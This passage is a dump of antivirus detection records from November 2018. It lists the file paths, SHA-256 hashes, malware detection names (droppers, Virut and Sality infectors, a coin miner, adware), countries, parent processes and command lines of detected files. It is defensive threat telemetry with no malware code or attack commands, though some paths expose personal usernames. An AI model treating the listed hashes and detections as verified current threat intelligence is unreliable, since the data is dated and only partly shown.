  Row(detection=Row(filename='a0090264.dll', filepath='\\?\\C:\\System Volume Information\\_restore{982094BC-279E-4BD6-B13C-C816EB255F52}\\RP445\\A0090264.dll', filesize=1280000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='eca22891b44b44273ec1985e451772760d4d7b39a67d094c136ab57b9eb90800', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231828-f72992af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0dee616\\AVSCAN-20181102-231629-E7E58321\\AVSCAN-20181102-231828-F72992AF', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='c2621af26e54406adb55593c8ee2b80af6fef0eef053dd1c891def234c78d82c', metadata=Row(cmdline=None, country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='accountpictures.exe', filepath='C:\\Users\\X\\AccountPictures\\AccountPictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f4073c84a63957cecc6e3323a5a6ed1a1ac7a23ab4742bfb9f1be268dbabc81a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\F4073C84A63957CECC6E3323A5A6ED1A1AC7A23AB4742BFB9F1BE268DBABC81A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f4073c84a63957cecc6e3323a5a6ed1a1ac7a23ab4742bfb9f1be268dbabc81a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:57:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\hrtncybfd1u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alcwzrd.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13035\\drp\\AllXP\\6844\\AlcWzrd.exe', filesize=2816000, name='TR/Crypt.CFI.Gen.#M300.#R3419'), hash='ff2d754848713b0b1861ca1e67cc06eca558c68d59e6d8d95940037595923438', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230031-2f2286c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-230013-2BC8EFBA\\AVSCAN-20181104-230031-2F2286C8', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen[1].exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/BRC/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/ardv_suspicious_file(s)/keygen[1].exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:59:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293599', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293599', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b484', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b484', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:13:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atube_catcher_atu3_9000.exe', filepath='c:\\users\\X\\desktop\\atube_catcher_atu3_9000.exe', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T13:29:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cd36', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cd36', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:41:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='net03.exe', filepath='C:\\Users\\X\\Desktop\\U盘\\软件\\网络工具\\FTP架设\\NET03.exe', filesize=64000, name='HEUR/AGEN.1000534.#M1.#R1'), hash='ff8f4570063ff347c2023453a77c1f5354ce3609ffeeacf8c4d4f85700b1ef0f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:k\\\\\\/yF76wjB0isFh1K.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T00:49:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023933a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023933a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:38:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kgftbz_posemod.exe', filepath='c:\\users\\X\\downloads\\play as megami mod by alexgaming\\kgftbz_posemod.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T16:06:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200940-51f026f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92eb22e5\\AVSCAN-20181104-200336-214979A4\\AVSCAN-20181104-200940-51F026F1', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:09:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:03:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsi3C83.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T22:21:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chickeninvadersrotyxmasinstaller320.exe', filepath='\\?\\J:\\العاب2\\حرب الفراخ 3\\ChickenInvadersROTYXmasInstaller320.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4866d33bfd71f48abfe10e37e70bd42b80e23caa63bf27cd4f077e7ee3b9df', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-224629-58fcf191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ed3a19d\\AVSCAN-20181101-224555-52C16CEA\\AVSCAN-20181101-224629-58FCF191', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091326-1d0b64cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ab2dd11\\AVSCAN-20181101-091141-0DC7349A\\AVSCAN-20181101-091326-1D0B64CF', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:24Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:34:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:58:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194135-0454f55a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192443-4FB98EEF\\AVSCAN-20181102-194135-0454F55A', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:41:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='صور خاصة.exe', filepath='H:\\صور خاصة.exe', filesize=256000, name='HEUR/AGEN.1008186.#M1.#R1'), hash='6b609bf13be04c0e56af6199a9a05f748877c66564c4f1108afcd4413b8d2434', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-02T15:30:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6002296\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\microsoft-office-2010_1500696195.exe', parentsize=2323968, timestamp='2018-11-02T19:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='accountpictures.exe', filepath='C:\\Users\\X\\AccountPictures\\AccountPictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235844-84f62a2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-235823-828AA38D\\AVSCAN-20181102-235844-84F62A2E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:58:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskhost.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.exe', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:JWJst0ZD+UmDpJ2+.1', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T04:42:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='startw.exe', filepath='G:\\العاب\\العاب\\hamzah\\GAMES\\دومنه 2\\STARTW.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='6b3c544147febebe0b20c0ca9141a4c05448d4ae8610774351f8a6b0784463a3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1034752, timestamp='2018-11-02T22:09:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='62~.exe', filepath='C:\\Dokumente und Einstellungen\\Blahusch\\Lokale Einstellungen\\Temp\\62~.exe', filesize=192000, name='TR/Dropper.A.1801.#M1.#R1'), hash='717ffdf06b37d1dd5b81cdb3a3d14cfd1742d8d53cb41a0f348afaabdce884d7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d252', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d252', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline='\\\\\\/dde', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE', parentsize=32902304, timestamp='2018-11-02T06:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192124-4a962f49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192124-4A962F49', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1000.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\1000\\1000.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='28638453117ca2d992efeca0d6db1da00cb180d109b7edb408dfb8f26b776fe1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-18\\28638453117CA2D992EFECA0D6DB1DA00CB180D109B7EDB408DFB8F26B776FE1', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='28638453117ca2d992efeca0d6db1da00cb180d109b7edb408dfb8f26b776fe1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d6d48977c0b00562075afcde578ab9223d4e96b7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d6d48977c0b00562075afcde578ab9223d4e96b7', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='2836c5ad99f9bd0ecd7f538db9d2b04db0df5e6f2703fd8f263b452b4338a329', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:20Z'), dt=datetime.date(2018, 11, 2)),
